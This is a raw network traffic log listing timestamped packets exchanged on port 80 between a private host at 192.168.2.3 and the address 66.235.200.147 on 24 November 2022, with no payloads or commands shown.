Nov 24, 2022 12:20:03.529196024 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529206038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529230118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529241085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529248953 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529273987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529285908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529297113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529313087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529320002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529335022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529345989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529356956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529370070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529387951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529387951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529397011 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529423952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529448032 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529449940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529474020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529479980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529491901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529501915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529519081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529530048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529553890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529553890 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529575109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529577017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529601097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529603958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529625893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529628038 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529647112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529652119 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529675961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529678106 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529700041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529704094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529725075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529726028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529751062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529768944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529776096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529783010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529803038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529803038 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529814959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529827118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529844046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529851913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529877901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529882908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529894114 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529903889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529928923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.529932976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529958010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529980898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.529983044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530008078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530021906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530031919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530055046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530077934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530095100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530097008 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530121088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530141115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530143976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530168056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530174971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530190945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530198097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530214071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530216932 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530236959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530239105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530252934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530262947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530286074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530301094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530312061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530313015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530324936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530335903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530359983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530383110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530391932 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530405998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530425072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530430079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530446053 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530452967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530472994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530478001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530502081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530514002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530524969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530527115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530544043 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530555964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530582905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530586958 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530602932 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530606985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530631065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530632019 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530646086 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530653000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530674934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530675888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530699015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530703068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530729055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530733109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530755997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530783892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530802965 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530802965 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530802965 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530812979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530839920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530852079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530852079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530867100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530894041 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530917883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530939102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530946970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.530972004 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.530975103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531002045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531030893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531042099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531058073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531071901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531084061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531105042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531111002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531138897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531152010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531169891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531183004 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531199932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531203985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531229973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531259060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531260967 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531276941 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531289101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531289101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531313896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531341076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531342030 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531356096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531367064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531392097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531403065 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531403065 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531419039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531445026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531469107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531440973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531481981 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531493902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531497002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531506062 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531522989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531541109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531548977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531574011 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531588078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531599045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531603098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531629086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531645060 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531656027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531682014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531682968 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531708002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531708956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531733990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531734943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531752110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531755924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531780005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531780958 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531805038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531806946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531820059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531831980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531857967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531858921 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531884909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531913996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531918049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531939983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531955004 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.531968117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531991005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.531996965 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532016993 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532035112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532044888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532068014 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532072067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532098055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532102108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532124043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532140970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532151937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532154083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532177925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532180071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532200098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532202959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532224894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532231092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532246113 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532258034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532270908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532284975 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532304049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532315016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532341003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532347918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532356977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532377005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532392979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532407999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532437086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532459974 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532466888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532493114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532499075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532520056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532532930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532550097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532579899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532579899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532579899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532604933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532613039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532640934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532649994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532669067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532699108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532707930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532707930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532723904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532725096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532746077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532752991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532779932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532799006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532799959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532805920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532830000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532831907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532859087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532860994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532876015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532886028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532912016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532912970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532941103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532969952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.532979012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.532998085 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533021927 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533030033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533046961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533060074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533091068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533094883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533118963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533122063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533147097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533173084 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533174038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533173084 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533198118 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533202887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533222914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533232927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533257961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533260107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533277035 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533291101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533317089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533343077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533345938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533373117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533396006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533399105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533410072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533432007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533432961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533457994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533458948 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533473015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533488035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533515930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533519983 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533541918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533551931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533570051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533576012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533600092 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533606052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533632994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533660889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533679008 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533689022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533711910 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533718109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533740997 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533749104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533771992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533777952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533799887 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533806086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533835888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533838034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533864975 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533870935 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533895969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533907890 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533927917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533953905 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533955097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.533978939 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.533984900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534013987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534018993 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534043074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534048080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534074068 CET	80	49710	66.235.200.147	192.168.2.3
